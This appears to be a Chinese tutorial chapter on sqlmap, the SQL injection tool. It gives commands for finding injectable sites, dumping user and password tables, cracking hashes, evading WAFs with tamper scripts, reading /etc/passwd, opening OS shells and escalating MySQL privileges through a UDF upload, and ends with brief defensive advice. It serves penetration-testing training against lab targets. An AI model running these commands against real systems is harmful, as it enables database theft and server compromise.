sqlmap从入门到精通-第一章-2-4-sqlmap使用攻略及技巧(2)

2.4.4 检测和利用SQL注入

1.手工判断是否存在漏洞

针对可能存在SQL注入漏洞的URL添加+AND+1=1 和 +AND+1=2 看返回的结果是否一致,如果不一致那么就存在SQL注入

2.sqlmap自动检测

实际测试使用sqlmap的过程中会一直提示你应答,有交互的过程,可以通过参数--batch 来完成自动应答的效果

3.寻找和判断实例

可以通过百度或者谷歌使用相关语法进行搜索,这里不做具体细节演示,可以搜索Google Hack语法

4.批量检测

可以将收集到可能存在SQL注意漏洞的URL放在一个文本文件中,例如:将所有的URL地址保存 bmfx.txt ,然后使用sqlmap.py -m bmfx.txt 即可开始进行批量注入探测,注意bmfx.txt文件需要和sqlmap在同一个目录下,否则sqlmap找不到对应的文件

2.4.5 直接连接数据库

sqlmap直接连接数据库的命令如下:

sqlmap.py -d "mysql://root:root@192.168.91.130:3306/dvwa" -f --banner --dbs --users

2.4.6 数据库相关操作

1.列数据库信息:--dbs

2.目标站点当前Web所使用的数据库:--current-db

3.目标站点当前Web所使用数据库的账户:--current-user

4.列出目标站点数据库的所有用户:--users

5.列出目标站点数据库的密码:--passwords

6.指定库名列出所有表:-D database --tables

参数说明:

-D 指定数据库名称

7.指定库名表名列出所有字段:-D bmfx_com -T root --columns

参数说明:

-T 指定要列出字段的表

8.指定库名表名字段dump出指定字段:

-D bmfx_com -T admin -C id,username,password --dump

-D bmfx_com -T admin -C "id,username,password" --dump

上面可以加双引号,也可以不加双引号

9.导出多少条数据:

-D bmfx_com -T admin -C id,username,password --start 1 --stop 10 --dump

参数说明:

--start 指定开始的行

--stop  指定结束的行

上述含义就是导出id,username,password 的1-10行的数据内容

2.4.7 sqlmap使用技巧

1.MySQL的注释方法绕过WAF进行SQL注入

(1) 使用sqlmap进行注入测试:

sqlmap.py -u "http://192.168.91.130/dvwa/vuln.php?id=3" --tamper "halfversionedmorekeywords.py"

(2) 其他绕过WAF脚本的方法

sqlmap.py -u "http://192.168.91.130/dvwa/vuln.php?id=3" --tamper tamper/between.py, tamper/randomcase.py -v 3

(4) tamper目录下文件的具体含义:

space2comment    空格替换为/**/

apostrophemask    单引号替换为UTF-8字符

equaltolike    等号替换为like

space2dash    空格替换为–加随机字符 ; 绕过过滤‘=‘ 替换空格字符(‘ ‘) , (‘-‘) 跟一个破折号注释,一个随机字符串和一个新行(‘n‘)

greatest    大于号替换为greatest;绕过过滤‘>‘,用GREATEST替换大于号

space2hash    空格替换为#加随机字符; 空格替换为#,随机字符串及换行符

apostrophenullencode    替换双引号为%00%27;绕过过滤双引号,替换字符和双引号

halfversionedmorekeywords  在每个关键字前加注释

space2morehash    空格替换为#加更多的随机字符及换行符

appendnullbyte    在有效载荷结束位置加载零字节字符编码 例如:%00

ifnull2ifisnull  绕过对IFNULL过滤,替换类似IFNULL(A,B)为IF(ISNULL(A),B,A)

space2mssqlblank    空格替换为其他空符号 ; 替换空格

modsecurityversioned  过滤空格,包含完整的查询版本的注释

base64encode    使用base64编码替换

space2mssqlhash    空格替换为%23%0A

space2mysqldash  替换空格字符(‘‘),(‘-‘) 后跟一个破折号注释一个新行(‘n‘)

space2mysqlblank    空格替换为其他空白符号(Mysql)

between    比较符替换为between ; 用between替换大于号(>)

multiplespaces    围绕SQL关键字添加多个空格

space2plus    空格替换为加号 ; 用+替换空格

bluecoat    代替空格字符后与一个有效的随机空白字符的SQL语句,等号替换为like

nonrecursivereplacement    双重查询语句取代SQL关键字;替换预定义关键字

space2randomblank    代理空格字符(""),从空白字符集中选择&09,%0A,%0C,%0D 来替代空白符

sp_password    追加sp_password,从DBMS日志的自动模糊处理的有效载荷的末尾

chardoubleencode    双url编码(不处理已编码的)

unionalltounion    union all select替换为union select

charencode    URL编码

randomcase    字符大小写随机替换;随机大小写

unmagicquotes    宽字符绕过GPC addslashes

randomcomments  使用/**/分割SQL关键字

charunicodeencode    字符串unicode编码

securesphere    追加特制的字符串

versionedmorekeywords    使用注释绕过

2.URL重写SQL注入测试

value1 为测试参数,加"*" 即可,sqlmap将会测试value1的位置是否存在注入

sqlmap.py -u "http://targeturl/paraml/value1*/param2/value2"

3.列举并破解密码哈希值

当前用户有权限读取包含用户密码的权限时,sqlmap会先列举出用户,然后列出Hash,并尝试破解

sqlmap.py -u "http://192.168.91.130/sqlmap/mysql/get_int.php?id=3" --passwords -v 1

4.获取表中的数据个数

代码如下:

sqlmap.py -u "http://192.168.91.130/sqlmap/mysql/get_int.php?id=3" --count -D bmfxdb

5.对网站xxx.com进行漏洞爬取

代码如下:

sqlmap.py -u "http://xxx.com/sqlmap/mysql/get_int.php?id=3" --batch --crawl=3

6.基于布尔SQL注入预估时间

代码如下:

sqlmap.py -u "http://xxx.com/sqlmap/mysql/get_int.php?id=3" --b --eta

7.使用hex避免字符编码导致数据丢失

代码如下:

sqlmap.py -u "http://xxx.com/sqlmap/mysql/get_int.php?id=3" --banner --hex -v 3 --parse-errors

8.模拟测试手机环境站点

代码如下:

sqlmap.py -u "http://xxx.com/sqlmap/mysql/get_int.php?id=3" --mobile

9.智能判断测试

代码如下:

sqlmap.py -u "http://xxx.com/sqlmap/mysql/get_int.php?id=3" --batch --smart

10.结合burpsuite进行注入

代码如下:

通过burpsuite抓包,需要设置burpsuite记录请求日志

sqlmap.py -r burpsuite.txt

指定表单注入:

sqlmap.py -u "http://xxx.com/sqlmap/mysql/get_int.php?id=3" --data "username=root&password=root"

11.sqlmap自动填写表单注入

sqlmap.py -u URL --forms

sqlmap.py -u URL --forms --dbs

sqlmap.py -u URL --forms --current-db

sqlmap.py -u URL --forms -D 数据库名 --tables

sqlmap.py -u URL --forms -D 数据库名 -T 表名 --columns

sqlmap.py -u URL --forms -D 数据库名 -T 表名 -C username,password --dump

12.读取Linux下的文件

代码如下:

sqlmap.py -u URL --file /etc/passwd

13.延时注入

代码如下:

sqlmap.py -u URL --technique -T --current-user

14.sqlmap结合Burpsuite进行post注入

结合Burpsuite来使用sqlmap

使用Burpsuite一个POST登录的请求数据包,然后保存为bmfx.txt ,并保存在sqlmap目录下面,运行如下命令

sqlmap.py -r bmfx.txt -p tfUPass

15.sqlmap Cookies注入

代码如下:

sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --dbs --level 2

默认情况下sqlmap只支持get/post参数的注入测试,但是如果使用--level 设置其参数数值大于等于2的时候,sqlmap就会去检查Cookie中的参数,当大于等于3的时候就会去检查User-Agent和Referer,可以通过Burpsuite获取Cookie值,然后开始注入:

sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --level 3

sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --level 3--dbs

sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --level 3 --current-db

sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --level 3 -D 数据库名 --tables

sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --level 3 -D 数据库名 -T 表名 --columns

sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --level 3 -D 数据库名 -T 表名 -C username,password --dump

16.Mysql提权

(1) 连接Mysql数据打开一个交互shell:

sqlmap.py -d mysql://root:root@127.0.0.1:3306/bmfx --sql-shell

select @@version;

select @@plugin_dir;

D:\\phpstudypro\\bin\\mysql\\mysql5.6.17\\lib\\plugin\\

(2) 利用slqmap上传lib_mysqludf_sys到Mysql插件目录

sqlmap.py -d mysql://root:root@127.0.0.1:3306/bmfx --file-write=D:/tmp/lib_mysqludf_sys.dll --file-dest=D:\\phpstudypro\\bin\\mysql\\mysql5.6.17\\lib\\plugin\\lib_mysqludf_sys.dll

CREATE FUNCTION sys_exec RETURNS STRING SONAME ‘lib_mysqludf_sys.dll‘

CREATE FUNCTION sys_eval RETURNS STRING SONAME ‘lib_mysqludf_sys.dll‘

select sys_eval(‘ver‘);

17.执行shell命令

代码如下:

sqlmap.py -u URL --os-cmd="net user"  执行net user命令

sqlmap.py -u URL --os-shell  系统交互式shell

18.延时注入

代码如下:

sqlmap.py -u URL --delay 0.5  延时0.5秒

sqlmap.py -u URL --safe-freq  请求2次

2.4.8 安全防范

利用sqlmap进行的所有攻击都是因为存在安全漏洞,因此建议的安全防范防范如下:

(1) 对源代码进行安全代码审计,对存在安全漏洞的代码进行修补

(2) 在网站部署云安全防护,如云盾,安全狗等各种安全防护软件

(3) 定期查看网站安全日志,分析主要访问来源,对涉及可能攻击的页面进行检查

 

sqlmap从入门到精通-第一章-2-4-sqlmap使用攻略及技巧(2)
 

sqlmap从入门到精通-第一章-2-4-sqlmap使用攻略及技巧(2)

上一篇:Mysql事物的4种隔离级别


下一篇:JMeter压测MySQL数据库